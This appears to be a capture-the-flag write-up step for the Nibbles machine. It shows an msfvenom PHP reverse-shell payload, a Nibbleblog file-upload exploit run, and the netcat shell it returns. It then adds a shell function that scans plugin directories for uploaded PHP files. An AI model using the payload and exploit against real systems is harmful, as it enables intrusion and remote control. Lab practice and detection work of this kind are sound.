3 fileUpload exploit

Using https://github.com/TheRealHetfield/exploits/blob/master/nibbleBlog_fileUpload.py

$ msfvenom -p php/reverse_perl --format raw -o nibble.txt LHOST=10.10.14.15 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1919 bytes
Saved as: nibble.txt

$ chmod +x nibbleBlog_fileUpload.py

$ ./nibbleBlog_fileUpload.py
[-] LOGIN RESPONSE: 200 OK
[+] Login Successful.
[-] Upload likely successful.
[-] UPLOAD RESPONSE: 200 OK
[+] Exploit launched, check for shell.
[-] EXPLOIT RESPONSE: 200 OK

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 52620
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
whoami;id
nibbler
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
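
The shell above opens in content/private/plugins/my_image, the directory the uploaded payload ran from. The check below is a defender-side sweep for that condition, added here as an example; it is not part of the original write-up or of the linked script. The function name scan_plugin_uploads is hypothetical, and it assumes plugin content directories should hold only data files, so PHP there is worth reviewing.

```shell
#!/bin/sh
# Added example: report PHP files sitting in Nibbleblog plugin content
# directories (WEBROOT/content/private/plugins/<plugin>/).
# Assumption: these directories normally contain only plugin data such as
# settings and images, never executable scripts.
#
# Usage: scan_plugin_uploads /var/www/html/nibbleblog
# Output: one line per finding, "<reason> <path>"
# Return: 0 = clean, 1 = findings, 2 = plugin directory not found
scan_plugin_uploads() {
    dir="$1/content/private/plugins"
    [ -d "$dir" ] || { echo "no plugin directory under $1" >&2; return 2; }

    findings=$(
        find "$dir" -type f | sort | while IFS= read -r f; do
            # Compare extensions case-insensitively (.PHP, .Phtml, ...).
            lower=$(printf '%s' "$f" | tr 'A-Z' 'a-z')
            case "$lower" in
                *.php|*.php[0-9]|*.phtml|*.phar)
                    echo "ext $f"
                    continue ;;
            esac
            # A script renamed to look like an image or text file still
            # carries a PHP opening tag near the start of the file.
            if head -c 4096 "$f" | grep -aqi '<?php'; then
                echo "content $f"
            fi
        done
    )

    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}
```

Run it from cron or a file-integrity job against the web root and alert on a non-zero return. Serving this directory with PHP execution disabled removes the need to rely on detection alone.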
